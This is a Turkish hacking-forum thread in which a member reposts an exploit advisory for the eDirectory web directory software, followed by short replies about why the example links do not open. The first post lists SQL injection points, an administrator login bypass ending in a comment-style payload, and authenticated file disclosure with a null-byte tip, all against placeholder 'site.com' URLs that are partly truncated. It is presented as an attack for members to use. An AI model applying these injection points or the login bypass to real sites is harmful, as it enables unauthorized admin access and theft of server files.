İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

eDirectory - SQL Injection

20-02-2019 21:25
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
# Exploit Title/Exploit Başlığı: Admin auth bypass, SQLi and File Disclosure
# Dork: N/A
# Date/Tarih: Mart2019
# Exploit Author/Exploit Yazarı: Efren Diaz
# Vendor Homepage/Yapımcı Sitesi: https://www.edirectory.com/
# Software Link/Yazılımın Linki: N/A
# Version/Versiyon: Bütün versiyonlar
# Tested on/Test Edilen Sistem: Ubuntu 14.04
# CVE : N/A

#Description/Açıklama:
eDirectory, kendi şirket web sitenizi, işletme rehberlerinizi, kupon sitelerinizi, yerel rehberinizi, öncü gen sitelerini ve daha fazlasını oluşturmak için bir web tabanlı bir yazılımdır.

# Administrator Login Bypass
Login SQL injection, yönetini kimlik doğrulamasını önlemek ve direkt olarak admin panele bağlanmamız için kullanılan bir yöntemdir.

# SQL Injection
Links/Linkler:
- https://site.com/lo cation.php?type=...vel=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]

# Administrator Login Bypass
Link: https://site.com/sitemgr/login.php?k...emgr' -- -


# File Disclosure (authenticated)
Not:Sadece .php uzantılı dosyalar,fakat eski .php uzantılı dosyalar için null-byte ı deneyin.
Links:
- https://site.com/sitemgr/langcenter/..._id=[PATH]
- https://site.com/sitemgr/configurati..._id=[PATH]
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

BatHero Teşekkür etti.

20-02-2019 22:07
#2
BatHero - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
Space
Mesajlar:
198
Teşekkür (Etti):
52
Teşekkür (Aldı):
16
Konular:
36
Linkler açılmıyor VPN kullansamda bağlanamadım
Kullanıcı İmzası
Hedef gelecek.
Konu BatHero tarafından (20-02-2019 22:12 Saat 22:12 ) değiştirilmiştir.
20-02-2019 22:33
#3
Roothaning - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
334
Teşekkür (Etti):
1
Teşekkür (Aldı):
55
Konular:
17
Vpnsizde girilebiliyor sizde problem olmasın . Bu arada alttaki linkleri kast ediyorsanız onlar yapcanız işlem için örnek giriş biçimi site adı .com .net site her neyse sanırım ondan bahsediyorsunuz
Kullanıcı İmzası
Sakın Tıklama Bak Uyarıyorum.
Konu Roothaning tarafından (20-02-2019 22:38 Saat 22:38 ) değiştirilmiştir.
20-02-2019 22:42
#4
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Alıntı:
BatHero´isimli üyeden Alıntı Mesajı göster
Linkler açılmıyor VPN kullansamda bağlanamadım
Hocam aşağıdaki site.com olanlar örnek siteler için
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı